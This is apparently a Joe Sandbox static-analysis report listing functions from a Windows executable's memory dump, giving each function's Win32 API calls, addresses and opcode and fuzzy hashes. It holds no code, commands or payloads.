Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: fa04cc96bf622ce9e53ba7f9f9766b0cc7d360f2d021a8b8b36acca0288fda22
Instruction ID: 99057381209e6b2d49c0e63b22fe2586baeec34ba1664bf2d7b13931c55373c7
Opcode Fuzzy Hash: fa04cc96bf622ce9e53ba7f9f9766b0cc7d360f2d021a8b8b36acca0288fda22
Instruction Fuzzy Hash: 7D810971A00209EFCB45DF94C984EEEB7B9FF89315F204558E506AB250DB71AE4ACF60

Uniqueness

Uniqueness Score: -1.00%

Function 00161391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001614C0

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 24a9b8c79e45ff75a9a5b4094ce8b3343da815c1782b253702317d39601c8657
Instruction ID: 699821b62964988b787465770f313e6e19b343950b7bb73f651af596933e6131
Opcode Fuzzy Hash: 24a9b8c79e45ff75a9a5b4094ce8b3343da815c1782b253702317d39601c8657
Instruction Fuzzy Hash: 9F414F31900111FBDB257BFD9C46ABE3AA5FF61370F1C4225F819D72A1EB7488625262

Uniqueness

Uniqueness Score: -1.00%

Function 001B6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0178FC68,?), ref: 001B62E2
ScreenToClient.USER32(?,?), ref: 001B6315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 001B6382

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 5608737aa7235cae407c151d168cf594ffa1dd0e3c2a3d988689f76fbd565ed5
Instruction ID: 221814fad2593b42f6218bdccf347a41841e2fb8793c99f96bfd9204437bcea6
Opcode Fuzzy Hash: 5608737aa7235cae407c151d168cf594ffa1dd0e3c2a3d988689f76fbd565ed5
Instruction Fuzzy Hash: 67511974A00209EFDB10DF68D8809EE7BF5FB65364F108269F9599B2A0D774AD81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001A1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 001A1AFD
WSAGetLastError.WSOCK32 ref: 001A1B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 001A1B8A
WSAGetLastError.WSOCK32 ref: 001A1B94

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: d5667c000ba2357ba42e43b5610bbfaf7c579ae6e007c82a2abcfa0d3d6edcfd
Instruction ID: a9c4670e49b499b535f67e0c41034b73572ad01b2049c5c3736f10c2f1a5c101
Opcode Fuzzy Hash: d5667c000ba2357ba42e43b5610bbfaf7c579ae6e007c82a2abcfa0d3d6edcfd
Instruction Fuzzy Hash: DD41C338600210AFE720AF24D886F2A77E5AF59718F54844CF91A9F7D2D772DD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0015B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aa36b4e9e5b0db3935e00eba58b8d2211c7b163644dabf31a6c7a305f0fee5e
Instruction ID: 3475f06c0b30aa5bff8769bf7aad3d0d2f8674d3052b9f78328790a36f5331b1
Opcode Fuzzy Hash: 7aa36b4e9e5b0db3935e00eba58b8d2211c7b163644dabf31a6c7a305f0fee5e
Instruction Fuzzy Hash: F541E472A04314FFD7249F38CC81B6ABBA9EB98711F20452EF962DF292D771D9058780

Uniqueness

Uniqueness Score: -1.00%

Function 001956D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00195783
GetLastError.KERNEL32(?,00000000), ref: 001957A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001957CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001957FA

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: bd32ae9b50bdb2ec3dab551ea7c9fca75e0e045689bb6ecb793208973d7aec1a
Instruction ID: d37e1d63d4598d97d7461d74a37c113e0be17f352abd5c728379851ac711119a
Opcode Fuzzy Hash: bd32ae9b50bdb2ec3dab551ea7c9fca75e0e045689bb6ecb793208973d7aec1a
Instruction Fuzzy Hash: A6411D39600620DFCB15EF55D544A5EBBE2EF99320B198488E94AAB362CB34FD50CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0015D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00146D71,00000000,00000000,001482D9,?,001482D9,?,00000001,00146D71,8BE85006,00000001,001482D9,001482D9), ref: 0015D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0015D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0015D9AB
__freea.LIBCMT ref: 0015D9B4

Part of subcall function 00153820: RtlAllocateHeap.NTDLL(00000000,?,001F1444,?,0013FDF5,?,?,0012A976,00000010,001F1440,001213FC,?,001213C6,?,00121129), ref: 00153852

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 766f2084a030f4f90aea9a6d6c81c74ed1e3b4eef56ed57fc5a06f42421c49de
Instruction ID: 823ec4f9bb5d8e0e12212a0a427a98576b635a26379b78ac496887955d52428e
Opcode Fuzzy Hash: 766f2084a030f4f90aea9a6d6c81c74ed1e3b4eef56ed57fc5a06f42421c49de
Instruction Fuzzy Hash: 1A31D072A0020AEBDF25DF64EC41EAE7BA5EB41315F050268FC24EB160EB35CD58CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001B52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 001B5352
GetWindowLongW.USER32(?,000000F0), ref: 001B5375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 001B5382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001B53A8

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: f6751cfe7abfff2e69012f0ea801a24a6155c8b1964e4bac39ef55a5ae195326
Instruction ID: 993d61255bdc74f440ae551170527a02a7d7029737aed4fd15306098c064c5cd
Opcode Fuzzy Hash: f6751cfe7abfff2e69012f0ea801a24a6155c8b1964e4bac39ef55a5ae195326
Instruction Fuzzy Hash: 64318B34A55A08EFEB349B14CC56FE877E7BB04390F584102FA11963F1C7B5A980DB92

Uniqueness

Uniqueness Score: -1.00%

Function 0018AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0018ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0018AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0018AC74
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0018ACC6

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 5b9fc7e31811337aa8cc54a17d9d141b46fd92ed3ba1667125ec8a50300186d7
Instruction ID: 3fa05fb885d0cae75c1d0d747d632927adf7e1a91f686b5f1d9dae880dab1d12
Opcode Fuzzy Hash: 5b9fc7e31811337aa8cc54a17d9d141b46fd92ed3ba1667125ec8a50300186d7
Instruction Fuzzy Hash: 79310970A047186FFF35EB658C04BFA7BA5AF49310F88431BE485561D1C3759B858F92

Uniqueness

Uniqueness Score: -1.00%

Function 001B7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 001B769A
GetWindowRect.USER32(?,?), ref: 001B7710
PtInRect.USER32(?,?,001B8B89), ref: 001B7720
MessageBeep.USER32(00000000), ref: 001B778C

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: f8008b1324ded0c2424fc83b0e782fa5574173fc302e63c62366658243a55526
Instruction ID: 75d75ad9a871b1ca421904dcb7d75f8ab3b82919722ae525a944201128993cbc
Opcode Fuzzy Hash: f8008b1324ded0c2424fc83b0e782fa5574173fc302e63c62366658243a55526
Instruction Fuzzy Hash: F441AB34A09254EFCB11CF59C898EE9B7F4FB98304F1541A8E8159B2A1CB70E981CF90

Uniqueness

Uniqueness Score: -1.00%

Function 001B16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 001B16EB

Part of subcall function 00183A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00183A57
Part of subcall function 00183A3D: GetCurrentThreadId.KERNEL32 ref: 00183A5E
Part of subcall function 00183A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001825B3), ref: 00183A65

GetCaretPos.USER32(?), ref: 001B16FF
ClientToScreen.USER32(00000000,?), ref: 001B174C
GetForegroundWindow.USER32 ref: 001B1752

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: f214ed5cdaa12518329146be08944522b6cd75861043d14ce6c33fa772b8353f
Instruction ID: 2a58d63606905e293210e9776b62583b38d0c579a1c1da7f17c1926e403eba6d
Opcode Fuzzy Hash: f214ed5cdaa12518329146be08944522b6cd75861043d14ce6c33fa772b8353f
Instruction Fuzzy Hash: 12317071D00159AFCB04EFA9D881CEEBBF9EF58304B5480A9E415E7651EB319E45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0018D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0018D501
Process32FirstW.KERNEL32(00000000,?), ref: 0018D50F
Process32NextW.KERNEL32(00000000,?), ref: 0018D52F
CloseHandle.KERNEL32(00000000), ref: 0018D5DC

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: a70587eb2066de1e5c12cabb550358a4ec6a0e1c9c78f70b72819a88a3410908
Instruction ID: 2cfda7e032f2ac99e855ba24b25f3186e298fc1221d2ebf8dbf195fbabeca523
Opcode Fuzzy Hash: a70587eb2066de1e5c12cabb550358a4ec6a0e1c9c78f70b72819a88a3410908
Instruction Fuzzy Hash: D431D4310083009FD300EF54E881AAFBBF8FFA9354F14092DF581971A1EB719A89CB92

Uniqueness

Uniqueness Score: -1.00%

Function 001B8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00139BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00139BB2

GetCursorPos.USER32(?), ref: 001B9001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00177711,?,?,?,?,?), ref: 001B9016
GetCursorPos.USER32(?), ref: 001B905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00177711,?,?,?), ref: 001B9094

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 4f630d8c9e10769571e348b60b42cd482bd01d32ac09d44af06aede547b005ee
Instruction ID: 4990af44fea035401c85262adff5f325f949324778a318f7f0c7260ce814eace
Opcode Fuzzy Hash: 4f630d8c9e10769571e348b60b42cd482bd01d32ac09d44af06aede547b005ee
Instruction Fuzzy Hash: 4F21AE35600018FFDB259F94CC98EFA7BB9FF8A350F044169FA059B261C3719991DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0018D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,001BCB68), ref: 0018D2FB
GetLastError.KERNEL32 ref: 0018D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0018D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,001BCB68), ref: 0018D376

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 1dd5a8ca3c91a62b6f557b2d5774d5f6e67741bad6e4eff5fdefae4d8a4bdefa
Instruction ID: e9561f213a96cd4750aa6ba05f9c7f461e242212450dcd61476872d230d7d17c
Opcode Fuzzy Hash: 1dd5a8ca3c91a62b6f557b2d5774d5f6e67741bad6e4eff5fdefae4d8a4bdefa
Instruction Fuzzy Hash: 5E216DB05093019F8710EF28E8818AEB7E4BF5A364F504A1DF899C72E1D7319A46CF93

Uniqueness

Uniqueness Score: -1.00%

Function 00181571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00181014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0018102A
Part of subcall function 00181014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00181036
Part of subcall function 00181014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00181045
Part of subcall function 00181014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0018104C
Part of subcall function 00181014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00181062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001815BE
_memcmp.LIBVCRUNTIME ref: 001815E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00181617
HeapFree.KERNEL32(00000000), ref: 0018161E

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 1ddc9dd9874aad4171ad83d9b5b698d6feeb99f168061fcf287cf8e628f75f3c
Instruction ID: 5d617301997da19595d70c420d341a5e4458b0ecd158e80da28418702a420b1d
Opcode Fuzzy Hash: 1ddc9dd9874aad4171ad83d9b5b698d6feeb99f168061fcf287cf8e628f75f3c
Instruction Fuzzy Hash: 8E212772E00109FFDB10EFA4C945BEEB7B8EF45354F184459E441AB241E770AA46CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001B2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 001B280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 001B2824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 001B2832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001B2840

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 0f72eca7538f7ab3b951958e75d1aad6f8770d67262477201a23d3ddc181a22d
Instruction ID: f5fe7ba24b90cb403f5f00ee8e2db00bdb570d66f73f99e112b5659f9b0e8a1a
Opcode Fuzzy Hash: 0f72eca7538f7ab3b951958e75d1aad6f8770d67262477201a23d3ddc181a22d
Instruction Fuzzy Hash: E021B331308511AFD7149B24D845FEA7B99AF59324F148258F4268B6E2CB71FC86C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 001878F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00188D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0018790A,?,000000FF,?,00188754,00000000,?,0000001C,?,?), ref: 00188D8C
Part of subcall function 00188D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00188DB2
Part of subcall function 00188D7D: lstrcmpiW.KERNEL32(00000000,?,0018790A,?,000000FF,?,00188754,00000000,?,0000001C,?,?), ref: 00188DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00188754,00000000,?,0000001C,?,?,00000000), ref: 00187923
lstrcpyW.KERNEL32(00000000,?), ref: 00187949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00188754,00000000,?,0000001C,?,?,00000000), ref: 00187984

Strings

cdecl, xrefs: 0018797B

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 1118cfa21b0f3f8634eaad1aa94f979596f68bdab895a4b38ebf2405d909646f
Instruction ID: 7073e5c3f0b248277faca558e2ddf345ce81d8bbd3b886454fff08907228e582
Opcode Fuzzy Hash: 1118cfa21b0f3f8634eaad1aa94f979596f68bdab895a4b38ebf2405d909646f
Instruction Fuzzy Hash: 6311293A600342ABCB15BF39C844D7A77A9FF553A4B50412AF842C72A4EF31D901CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001B7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 001B7D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 001B7D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 001B7D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0019B7AD,00000000), ref: 001B7D6B

Part of subcall function 00139BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00139BB2

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
